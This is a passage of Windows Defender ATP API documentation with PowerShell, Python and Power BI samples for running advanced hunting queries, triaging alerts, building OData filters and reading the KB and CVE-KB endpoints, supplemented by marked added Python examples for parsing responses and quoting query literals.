    resource = "$resourceAppIdUri"
    client_id = "$appId"
    client_secret = "$appSecret"
    grant_type = 'client_credentials'
}
$response = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $body -ErrorAction Stop
$aadToken = $response.access_token # Bearer token sent in the Authorization header below

where
$tenantId: ID of the tenant on behalf of which you want to run the query (the query runs against that tenant's data)
$appId: ID of your AAD app (the app must have the 'Run advanced queries' permission to Windows Defender ATP)
$appSecret: secret of your AAD app. Treat it like a password: do not commit it to source control, and rotate it if it leaks.
Run query
Run the following:

$query = 'RegistryEvents | limit 10' # Paste your own query here

$url = "https://api.securitycenter.windows.com/api/advancedqueries/run"
$headers = @{
    'Content-Type' = 'application/json'
    Accept = 'application/json'
    Authorization = "Bearer $aadToken"
}
# The query travels as the JSON body { "Query": "..." }
$body = ConvertTo-Json -InputObject @{ 'Query' = $query }
$webResponse = Invoke-WebRequest -Method Post -Uri $url -Headers $headers -Body $body -ErrorAction Stop
$response = $webResponse | ConvertFrom-Json
$results = $response.Results # array of result rows
$schema = $response.Schema   # array of { Name, Type } describing the columns

$results contains the results of your query
$schema contains the schema of the results of your query
Complex queries
If you want to run complex (or multi-line) queries, save your query in a file and, instead of the first line in the above sample, run the following:

$query = [IO.File]::ReadAllText("C:\myQuery.txt"); # Replace with the path to your file

Work with query results
You can now use the query results.
To output the results of the query in CSV format to the file file1.csv:

$results | ConvertTo-Csv -NoTypeInformation | Set-Content file1.csv

To output the results of the query in JSON format to the file file1.json:

$results | ConvertTo-Json | Set-Content file1.json

Related topic
Windows Defender ATP APIs
Advanced Hunting API
Advanced Hunting using Python
Schedule Advanced Hunting
Advanced Hunting using Python
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Run advanced hunting queries using Python. Read the Advanced Hunting API topic first.
In this section we share Python samples to retrieve a token and use it to run a query.

Prerequisite: You first need to create an app.

Get token
Run the following:

import json
import urllib.request
import urllib.parse

tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here

# Token endpoint of the tenant, and the resource (audience) the token is issued for
url = "https://login.windows.net/%s/oauth2/token" % (tenantId)
resourceAppIdUri = 'https://api.securitycenter.windows.com'

body = {
    'resource' : resourceAppIdUri,
    'client_id' : appId,
    'client_secret' : appSecret,
    'grant_type' : 'client_credentials'
}

# The token endpoint expects a form-encoded POST body
data = urllib.parse.urlencode(body).encode("utf-8")
req = urllib.request.Request(url, data)
response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
aadToken = jsonResponse["access_token"] # Bearer token sent in the Authorization header below

where
tenantId: ID of the tenant on behalf of which you want to run the query (the query runs against that tenant's data)
appId: ID of your AAD app (the app must have the 'Run advanced queries' permission to Windows Defender ATP)
appSecret: secret of your AAD app. Treat it like a password: do not commit it to source control, and rotate it if it leaks.

Run query
Run the following:

query = 'RegistryEvents | limit 10' # Paste your own query here

url = "https://api.securitycenter.windows.com/api/advancedqueries/run"
headers = {
    'Content-Type' : 'application/json',
    'Accept' : 'application/json',
    'Authorization' : "Bearer " + aadToken
}

# The query travels as the JSON body { "Query": "..." }
data = json.dumps({ 'Query' : query }).encode("utf-8")
req = urllib.request.Request(url, data, headers)
response = urllib.request.urlopen(req)
jsonResponse = json.loads(response.read())
schema = jsonResponse["Schema"]   # list of { "Name", "Type" } describing the columns
results = jsonResponse["Results"] # list of result rows (one dict per row)

schema contains the schema of the results of your query
results contains the results of your query
Complex queries
If you want to run complex (or multi-line) queries, save your query in a file and, instead of the first line in the above sample, run the following:

with open("D:\\Temp\\myQuery.txt", 'r') as queryFile: # Replace with the path to your file
    query = queryFile.read()

Work with query results
You can now use the query results.
To iterate over the results:

for result in results:
    print(result)              # Prints the whole result row
    print(result["EventTime"]) # Prints only the property 'EventTime' from the result

To output the results of the query in CSV format to the file file1.csv:

import csv

# newline='' keeps the csv module from inserting blank lines between rows on Windows
with open("D:\\Temp\\file1.csv", 'w', newline='') as outputFile:
    output = csv.writer(outputFile)
    if results: # an empty result set has no first row to take the column names from
        output.writerow(results[0].keys())
        for result in results:
            output.writerow(result.values())

To output the results of the query in JSON format to the file file1.json:

with open("D:\\Temp\\file1.json", 'w') as outputFile:
    json.dump(results, outputFile)
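The response carries a Schema next to Results, but the export code above writes each row exactly as the API sent it, so every DateTime stays a string and numbers keep whatever JSON gave them. The following added example (not code from the original page) uses the Schema to coerce each column to a Python type before exporting, keyed by the same type names the Power BI sample later on this page maps; it covers the Work with query results step of both the PowerShell and Python topics. The response is constructed in the shape POST /api/advancedqueries/run returns. The timestamp parser normalises the seven-digit fractional seconds the API's timestamps carry and the trailing Z, both of which datetime.fromisoformat rejects before Python 3.11.

```python
import csv
import io
import json
import re
from datetime import datetime, timezone
from typing import Any, Callable, Dict, List

_FRACTION_RE = re.compile(r"(\.\d{1,6})\d*")


def _parse_datetime(value: Any) -> datetime:
    """Parse the API's ISO-8601 UTC timestamps, e.g. 2018-11-25T16:19:21.8409809Z.

    fromisoformat() before Python 3.11 rejects more than six fractional digits and
    the trailing Z, so both are normalised first. Naive values are treated as UTC.
    """
    text = str(value).replace("Z", "+00:00")
    text = _FRACTION_RE.sub(r"\1", text)
    parsed = datetime.fromisoformat(text)
    return parsed if parsed.tzinfo else parsed.replace(tzinfo=timezone.utc)


def _parse_bool(value: Any) -> bool:
    return value if isinstance(value, bool) else str(value).strip().lower() == "true"


# Type names as they appear in the response Schema. Unlisted types pass through unchanged.
CONVERTERS: Dict[str, Callable[[Any], Any]] = {
    "Int64": int, "Int32": int, "Int16": int, "UInt64": int, "UInt32": int, "UInt16": int,
    "Byte": int, "SByte": int,
    "Double": float, "Single": float, "Decimal": float,
    "Boolean": _parse_bool,
    "DateTime": _parse_datetime,
    "String": str, "Guid": str,
}


def schema_columns(response: Dict[str, Any]) -> List[str]:
    """Column names in the order the Schema lists them."""
    return [column["Name"] for column in response["Schema"]]


def parse_response(response: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return Results as rows keyed in Schema order, with values coerced per their Schema type."""
    types = {column["Name"]: column["Type"] for column in response["Schema"]}
    rows = []
    for raw in response["Results"]:
        row = {}
        for name, type_name in types.items():
            value = raw.get(name)
            convert = CONVERTERS.get(type_name, lambda v: v)
            row[name] = None if value is None else convert(value)
        rows.append(row)
    return rows


def _json_default(value: Any) -> Any:
    return value.isoformat() if isinstance(value, datetime) else str(value)


def to_csv(rows: List[Dict[str, Any]], columns: List[str]) -> str:
    """CSV text with a header row; datetimes are written as ISO-8601 with offset."""
    buffer = io.StringIO()
    writer = csv.DictWriter(buffer, fieldnames=columns, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: _json_default(row[name]) if isinstance(row[name], datetime) else row[name]
                         for name in columns})
    return buffer.getvalue()


def to_json(rows: List[Dict[str, Any]]) -> str:
    return json.dumps(rows, default=_json_default, indent=2)


# Constructed response in the shape POST /api/advancedqueries/run returns.
SAMPLE_RESPONSE = {
    "Schema": [
        {"Name": "EventTime", "Type": "DateTime"},
        {"Name": "MachineId", "Type": "String"},
        {"Name": "ProcessId", "Type": "Int64"},
        {"Name": "IsHidden", "Type": "Boolean"},
    ],
    "Results": [
        {"EventTime": "2018-11-25T16:19:21.8409809Z", "MachineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337",
         "ProcessId": 4312, "IsHidden": False},
        {"EventTime": "2018-11-25T16:17:50Z", "MachineId": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
         "ProcessId": None, "IsHidden": "true"},
    ],
}

if __name__ == "__main__":
    typed_rows = parse_response(SAMPLE_RESPONSE)
    print(to_csv(typed_rows, schema_columns(SAMPLE_RESPONSE)))
    print(to_json(typed_rows))
```

Keying the rows by the Schema rather than by results[0].keys() also fixes the column order for an empty result set and for rows where a column is missing, which the writer above would otherwise silently misalign.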
Related topic
Windows Defender ATP APIs
Advanced Hunting API
Advanced Hunting using PowerShell
Schedule Advanced Hunting
Create custom reports using Power BI (app authentication)
4/8/2019 • 2 minutes to read

Run advanced hunting queries and show the results in Microsoft Power BI. Read the Advanced Hunting API topic first.
In this section we share a Power BI query sample that runs a query using an application token.
If you want to use a user token instead, refer to this tutorial.

Prerequisite: You first need to create an app.

Run a query
Open Microsoft Power BI
Click Get Data > Blank Query

Click Advanced Editor

Copy the query below and paste it in the editor after updating the values of TenantId, AppId, AppSecret and Query. The app secret is stored in clear text inside the query, so anyone who can open the report file can read it; keep the file access-controlled, or use the user-authentication variant linked under Related topic where that is a concern.
let
    TenantId = "00000000-0000-0000-0000-000000000000", // Paste your own tenant ID here
    AppId = "11111111-1111-1111-1111-111111111111", // Paste your own app ID here
    AppSecret = "22222222-2222-2222-2222-222222222222", // Paste your own app secret here
    Query = "MachineInfo | where EventTime > ago(7d) | summarize EventCount=count(), LastSeen=max(EventTime) by MachineId", // Paste your own query here

    ResourceAppIdUrl = "https://api.securitycenter.windows.com",
    OAuthUrl = Text.Combine({"https://login.windows.net/", TenantId, "/oauth2/token"}, ""),

    // Form-encoded body of the client credentials grant
    Resource = Text.Combine({"resource", Uri.EscapeDataString(ResourceAppIdUrl)}, "="),
    ClientId = Text.Combine({"client_id", AppId}, "="),
    ClientSecret = Text.Combine({"client_secret", Uri.EscapeDataString(AppSecret)}, "="),
    GrantType = Text.Combine({"grant_type", "client_credentials"}, "="),
    Body = Text.Combine({Resource, ClientId, ClientSecret, GrantType}, "&"),

    AuthResponse= Json.Document(Web.Contents(OAuthUrl, [Content=Text.ToBinary(Body)])),
    AccessToken= AuthResponse[access_token],
    Bearer = Text.Combine({"Bearer", AccessToken}, " "),

    AdvancedHuntingUrl = "https://api.securitycenter.windows.com/api/advancedqueries/run",
    Response = Json.Document(Web.Contents(
        AdvancedHuntingUrl,
        [
            Headers = [#"Content-Type"="application/json", #"Accept"="application/json", #"Authorization"=Bearer],
            Content=Json.FromValue([#"Query"=Query])
        ]
    )),

    // Map the type names returned in the response Schema to Power BI column types
    TypeMap = #table(
        { "Type", "PowerBiType" },
        {
            { "Double", Double.Type },
            { "Int64", Int64.Type },
            { "Int32", Int32.Type },
            { "Int16", Int16.Type },
            { "UInt64", Number.Type },
            { "UInt32", Number.Type },
            { "UInt16", Number.Type },
            { "Byte", Byte.Type },
            { "Single", Single.Type },
            { "Decimal", Decimal.Type },
            { "TimeSpan", Duration.Type },
            { "DateTime", DateTimeZone.Type },
            { "String", Text.Type },
            { "Boolean", Logical.Type },
            { "SByte", Int8.Type }, // a signed byte is a number, not a logical
            { "Guid", Text.Type }
        }),

    Schema = Table.FromRecords(Response[Schema]),
    TypedSchema = Table.Join(Table.SelectColumns(Schema, {"Name", "Type"}), {"Type"}, TypeMap , {"Type"}),
    Results = Response[Results],
    Rows = Table.FromRecords(Results, Schema[Name]),
    Table = Table.TransformColumnTypes(Rows, Table.ToList(TypedSchema, (c) => {c{0}, c{2}}))

in Table

Click Done
Click Edit Credentials

Select Anonymous and click Connect

Repeat the previous step for the second URL


Click Continue
Select the privacy level you want and click Save

View the results of your query

Related topic
Create custom Power BI reports with user authentication
Windows Defender ATP APIs
Advanced Hunting API
Advanced Hunting using PowerShell
Schedule Advanced Hunting
Windows Defender ATP APIs using PowerShell
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Full scenario using multiple APIs from Windows Defender ATP.
In this section we share PowerShell samples to:
Retrieve a token
Use the token to retrieve the latest alerts in Windows Defender ATP
For each alert that has Medium or High severity and is still open, check how many times the machine has connected to a suspicious URL

Prerequisite: You first need to create an app.

Preparation instructions
Open a PowerShell window.
If your execution policy does not allow you to run the PowerShell commands, you can relax it for the current process only, so the change does not persist after the window is closed:
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

For more details, refer to the PowerShell documentation.

Get token
Run the below

$tenantId: ID of the tenant on behalf of which you want to run the query (i.e., the query will be run on the
data of this tenant)
$appId: ID of your AAD app (the app must have 'Run advanced queries' permission to Windows Defender
ATP )
$appSecret: Secret of your AAD app
$suspiciousUrl: The URL
$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here
$suspiciousUrl = 'www.suspiciousUrl.com' # Paste your own URL here

# Client credentials flow against the tenant's token endpoint; the token is scoped to the WDATP service resource
$resourceAppIdUri = 'https://securitycenter.onmicrosoft.com/windowsatpservice'
$oAuthUri = "https://login.windows.net/$tenantId/oauth2/token"
$authBody = [Ordered] @{
resource = "$resourceAppIdUri"
client_id = "$appId"
client_secret = "$appSecret"
grant_type = 'client_credentials'
}
$authResponse = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $authBody -ErrorAction Stop
$aadToken = $authResponse.access_token

# Get the latest alerts (the backtick keeps PowerShell from expanding $top as a variable)
$alertUrl = "https://api.securitycenter.windows.com/api/alerts?`$top=10"
$headers = @{
'Content-Type' = 'application/json'
Accept = 'application/json'
Authorization = "Bearer $aadToken"
}
$alertResponse = Invoke-WebRequest -Method Get -Uri $alertUrl -Headers $headers -ErrorAction Stop
$alerts = ($alertResponse | ConvertFrom-Json).value

# Collect the distinct machines that have at least one open Medium/High alert
$machinesToInvestigate = New-Object System.Collections.ArrayList

Foreach($alert in $alerts)
{
#echo $alert.id $alert.machineId $alert.severity $alert.status

$isSevereAlert = $alert.severity -in 'Medium', 'High'
$isOpenAlert = $alert.status -in 'InProgress', 'New'
if($isOpenAlert -and $isSevereAlert)
{
if (-not $machinesToInvestigate.Contains($alert.machineId))
{
$machinesToInvestigate.Add($alert.machineId) > $null
}
}
}

# Without this guard an empty list would produce 'in ("")', a query that matches nothing
if ($machinesToInvestigate.Count -eq 0)
{
Write-Host 'No open Medium/High alerts in the latest batch; nothing to hunt for.'
return
}

# Build the KQL 'in' list: "id1","id2",...
$commaSeparatedMachines = '"{0}"' -f ($machinesToInvestigate -join '","')

$query = "NetworkCommunicationEvents
| where MachineId in ($commaSeparatedMachines)
| where RemoteUrl == `"$suspiciousUrl`"
| summarize ConnectionsCount = count() by MachineId"

# Run the advanced hunting query; the rows come back under the Results property
$queryUrl = "https://api.securitycenter.windows.com/api/advancedqueries/run"

$queryBody = ConvertTo-Json -InputObject @{ 'Query' = $query }

$queryResponse = Invoke-WebRequest -Method Post -Uri $queryUrl -Headers $headers -Body $queryBody -ErrorAction Stop
$response = ($queryResponse | ConvertFrom-Json).Results
$response
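The triage logic of the scenario above, as an added Python example that is not part of the original page and does not call the service. It reproduces the alert filtering and the KQL construction offline so both can be checked before a tenant is involved, and it adds two things the PowerShell script leaves out: the URL is quoted as a KQL string literal instead of being interpolated raw (a URL containing a double quote would otherwise terminate the literal and append operators to the query), and an empty machine list yields no query at all. The alert objects and the hunting response are constructed samples that follow the field names shown on this page.

```python
"""Offline version of the triage logic in the PowerShell scenario.

Added example (not code from the original page). It assumes alert objects
carry the 'severity', 'status' and 'machineId' fields shown in the page's
/api/alerts sample, and that advanced hunting rows come back under the
'Results' key. SAMPLE_ALERTS and SAMPLE_HUNTING_RESPONSE are constructed.
"""
import json

SEVERE = {"Medium", "High"}
OPEN = {"New", "InProgress"}


def select_machines_to_investigate(alerts):
    """Return distinct machine IDs that have at least one open Medium/High alert.

    Order of first appearance is preserved so the generated KQL is deterministic.
    """
    seen = []
    for alert in alerts:
        if alert.get("severity") in SEVERE and alert.get("status") in OPEN:
            machine_id = alert.get("machineId")
            if machine_id and machine_id not in seen:
                seen.append(machine_id)
    return seen


def kql_string(value):
    """Quote a value as a KQL double-quoted string literal.

    Backslashes and double quotes are escaped, so a hostile URL cannot close
    the literal and add its own operators to the query.
    """
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_connection_count_query(machine_ids, suspicious_url):
    """Build the NetworkCommunicationEvents query used in the scenario.

    Returns None when there is nothing to hunt for instead of emitting
    'where MachineId in ("")', which matches nothing.
    """
    if not machine_ids:
        return None
    id_list = ", ".join(kql_string(m) for m in machine_ids)
    return (
        "NetworkCommunicationEvents\n"
        f"| where MachineId in ({id_list})\n"
        f"| where RemoteUrl == {kql_string(suspicious_url)}\n"
        "| summarize ConnectionsCount = count() by MachineId"
    )


def connections_by_machine(hunting_response_json):
    """Turn the advanced hunting response body into {machineId: count}."""
    rows = json.loads(hunting_response_json).get("Results", [])
    return {row["MachineId"]: int(row["ConnectionsCount"]) for row in rows}


# Constructed sample alerts (same field names as the page's /api/alerts sample)
SAMPLE_ALERTS = [
    {"id": "a1", "machineId": "m-001", "severity": "High", "status": "New"},
    {"id": "a2", "machineId": "m-002", "severity": "Low", "status": "New"},
    {"id": "a3", "machineId": "m-001", "severity": "Medium", "status": "InProgress"},
    {"id": "a4", "machineId": "m-003", "severity": "High", "status": "Resolved"},
    {"id": "a5", "machineId": "m-004", "severity": "Medium", "status": "InProgress"},
]

# Constructed sample hunting response, shaped like /api/advancedqueries/run output
SAMPLE_HUNTING_RESPONSE = json.dumps({
    "Results": [
        {"MachineId": "m-001", "ConnectionsCount": 7},
        {"MachineId": "m-004", "ConnectionsCount": 1},
    ]
})

if __name__ == "__main__":
    machines = select_machines_to_investigate(SAMPLE_ALERTS)
    print(build_connection_count_query(machines, "www.suspiciousUrl.com"))
    print(connections_by_machine(SAMPLE_HUNTING_RESPONSE))
```

Run it as a script to see the generated query; in a real client the returned query string is what goes into the `Query` field of the POST body, and the response body goes through `connections_by_machine`.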

Related topic
Windows Defender ATP APIs
Advanced Hunting API
Advanced Hunting using Python
Schedule Advanced Hunting
OData queries with Windows Defender ATP
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
If you are not familiar with OData queries, see: OData V4 queries
Not all properties are filterable.
Properties that support $filter:
Alert: Id, IncidentId, AlertCreationTime, Status, Severity and Category.
Machine: Id, ComputerDnsName, LastSeen, LastIpAddress, HealthStatus, OsPlatform, RiskScore, MachineTags and RbacGroupId.
MachineAction: Id, Status, MachineId, Type, Requestor and CreationDateTimeUtc.
Example 1
Get all the machines with the tag 'ExampleTag'

HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=machineTags/any(tag: tag eq 'ExampleTag')

Response:

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "High",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2", "ExampleTag" ]
},
.
.
.
]
}

Example 2
Get all the alerts that were created after 2018-11-22T00:00:00Z

HTTP GET https://api.securitycenter.windows.com/api/alerts?$filter=alertCreationTime gt 2018-11-22T00:00:00Z

Response:

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
"value": [
{
"id": "121688558380765161_2136280442",
"incidentId": 7696,
"assignedTo": "secop@contoso.com",
"severity": "High",
"status": "New",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description",
"alertCreationTime": "2018-11-26T16:19:21.8409809Z",
"firstEventTime": "2018-11-26T16:17:50.0948658Z",
"lastEventTime": "2018-11-26T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
},
.
.
.
]
}

Example 3
Get all the machines with 'High' 'RiskScore'

HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=riskScore eq 'High'

Response:
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "High",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2", "ExampleTag" ]
},
.
.
.
]
}

Example 4
Get the top 100 machines whose 'HealthStatus' is not 'Active'

HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=healthStatus ne 'Active'&$top=100

Response:
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Inactive",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "High",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2", "ExampleTag" ]
},
.
.
.
]
}

Example 5
Get all the machines that were last seen after 2018-08-01

HTTP GET https://api.securitycenter.windows.com/api/machines?$filter=lastSeen gt 2018-08-01Z

Response:
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "High",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2", "ExampleTag" ]
},
.
.
.
]
}

Example 6
Get all the Anti-Virus scans that the user Analyst@examples.onmicrosoft.com created using Windows Defender ATP

HTTP GET https://api.securitycenter.windows.com/api/machineactions?$filter=requestor eq 'Analyst@examples.onmicrosoft.com' and type eq 'RunAntiVirusScan'

Response:

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#MachineActions",
"value": [
{
"id": "5c3e3322-d993-1234-1111-dfb136ebc8c5",
"type": "RunAntiVirusScan",
"requestor": "Analyst@examples.onmicrosoft.com",
"requestorComment": "1533",
"status": "Succeeded",
"machineId": "123321c10e44a82877af76b1d0161a17843f688a",
"creationDateTimeUtc": "2018-11-12T13:33:24.5755657Z",
"lastUpdateDateTimeUtc": "2018-11-12T13:34:32.0319826Z",
"relatedFileInfo": null
},
.
.
.
]
}

Example 7
Get the count of open alerts for a specific machine:

HTTP GET https://api.securitycenter.windows.com/api/machines/123321d0c675eaa415b8e5f383c6388bff446c62/alerts/$count?$filter=status ne 'Resolved'

Response:

HTTP/1.1 200 OK
Content-type: application/json

As with any OData $count request, the response body is the number of matching alerts rather than a JSON collection.
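The filter expressions in Examples 1 to 7 are easy to get wrong by hand, and building them by string concatenation from analyst input (a tag name, a user principal name) has the same shape as an injection problem: a value containing a single quote ends the OData string literal early. The following Python example is added here and is not code from the original page; it builds the same requests as the examples above, quotes string literals the way OData V4 requires (a single quote is doubled), formats date filters from timezone-aware values, and refuses properties the page lists as not filterable. The API root and the property lists are taken from this page; the machine ID used for the $count request in the demo is a constructed placeholder.

```python
"""Build OData $filter requests for the Windows Defender ATP API.

Added example (not code from the original page). FILTERABLE lists the
properties the page says support $filter, spelled in the camelCase the API
uses in request URLs.
"""
from datetime import datetime, timezone

API_ROOT = "https://api.securitycenter.windows.com/api"

FILTERABLE = {
    "alerts": {"id", "incidentId", "alertCreationTime", "status", "severity", "category"},
    "machines": {"id", "computerDnsName", "lastSeen", "lastIpAddress", "healthStatus",
                 "osPlatform", "riskScore", "machineTags", "rbacGroupId"},
    "machineactions": {"id", "status", "machineId", "type", "requestor", "creationDateTimeUtc"},
}

COMPARISONS = {"eq", "ne", "gt", "ge", "lt", "le"}


def odata_string(value):
    """Quote as an OData string literal; an embedded single quote is doubled."""
    return "'" + str(value).replace("'", "''") + "'"


def utc(year, month, day, hour=0, minute=0, second=0):
    """Timezone-aware UTC datetime helper for date filters."""
    return datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)


def odata_datetime(value):
    """Format an aware datetime as the ISO-8601 UTC literal OData expects (unquoted)."""
    if value.tzinfo is None:
        raise ValueError("use a timezone-aware datetime to avoid an ambiguous filter")
    return value.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def compare(resource, prop, op, literal):
    """Return 'prop op literal' after checking that prop is filterable on resource."""
    if prop not in FILTERABLE[resource]:
        raise ValueError(f"{prop} is not filterable on {resource}")
    if op not in COMPARISONS:
        raise ValueError(f"unsupported operator {op}")
    return f"{prop} {op} {literal}"


def has_tag(tag):
    """Example 1: machineTags is a collection, so it needs an any() lambda."""
    return f"machineTags/any(tag: tag eq {odata_string(tag)})"


def build_url(resource, filter_expr=None, top=None, count=False, path_prefix=None):
    """Assemble the request URL.

    $count (Example 7) is a path segment after the collection, not a query
    option. Spaces and quotes are left as-is, like the page's examples; HTTP
    clients such as requests or Invoke-WebRequest percent-encode them.
    """
    path = f"{API_ROOT}/{path_prefix}/" if path_prefix else f"{API_ROOT}/"
    path += resource + ("/$count" if count else "")
    params = []
    if filter_expr:
        params.append("$filter=" + filter_expr)
    if top is not None:
        params.append(f"$top={int(top)}")
    return path + ("?" + "&".join(params) if params else "")


if __name__ == "__main__":
    print(build_url("machines", has_tag("ExampleTag")))
    print(build_url("alerts", compare("alerts", "alertCreationTime", "gt",
                                      odata_datetime(utc(2018, 11, 22)))))
    print(build_url("machines", compare("machines", "healthStatus", "ne", odata_string("Active")), top=100))
    # Constructed machine ID; the $count segment sits between the collection and the query options
    print(build_url("alerts", "status ne 'Resolved'", count=True, path_prefix="machines/0123456789abcdef"))
    # A tag with a quote in it stays inside the literal instead of terminating it
    print(has_tag("O'Brien's laptop"))
```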

Related topic
Windows Defender ATP APIs
Get KB collection API
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of KBs and KB details.

Permissions
User needs read permissions.

HTTP request
GET /testwdatppreview/kbinfo

Request headers
HEADER VALUE

Authorization Bearer {token}. Required.

Content type application/json

Request body
Empty

Response
If successful - 200 OK.

Example
Request
Here is an example of the request.

GET https://graph.microsoft.com/testwdatppreview/KbInfo
Content-type: application/json

Response
Here is an example of the response.
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://graph.microsoft.com/testwdatppreview/$metadata#KbInfo",
"@odata.count": 271,
"value":[
{
"id": "KB3097617 (10240.16549) Amd64",
"release": "KB3097617 (10240.16549)",
"publishingDate": "2015-10-16T21:00:00Z",
"version": "10.0.10240.16549",
"architecture": "Amd64"
},
.
.
.
]
}
Get CVE-KB map API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a map of CVEs to KBs and CVE details.

Permissions
User needs read permissions.

HTTP request
GET /testwdatppreview/cvekbmap

Request headers
HEADER VALUE

Authorization Bearer {token}. Required.

Content type application/json

Request body
Empty

Response
If successful and map exists - 200 OK.

Example
Request
Here is an example of the request.

GET https://graph.microsoft.com/testwdatppreview/CveKbMap
Content-type: application/json

Response
Here is an example of the response.
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context":"https://graph.microsoft.com/testwdatppreview/$metadata#CveKbMap",
"@odata.count": 4168,
"value": [
{
"cveKbId": "CVE-2015-2482-3097617",
"cveId": "CVE-2015-2482",
"kbId":"3097617",
"title": "Cumulative Security Update for Internet Explorer",
"severity": "Critical"
},
.
.
.
]
}
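The two preview endpoints above are only useful together: kbinfo tells you which KBs exist per build and architecture, and cvekbmap tells you which CVEs each KB addresses. The following Python example is added here (it is not code from the original page) and joins the two response shapes offline: it parses the composite KB id into its number, build and architecture, indexes the CVE-KB map by KB number, and answers the question a patch-management review usually asks, which KBs fix at least one CVE of a given severity on a given platform. The two responses are constructed samples in the shapes shown above; the second and third rows of each are invented for the demo.

```python
"""Join the KB collection with the CVE-KB map from the two preview endpoints.

Added example (not code from the original page). It assumes kbinfo entries
whose 'id' reads 'KB<number> (<build>) <arch>' and cvekbmap entries with
cveId, kbId, title and severity, as in the page's samples.
"""
import re
from collections import defaultdict

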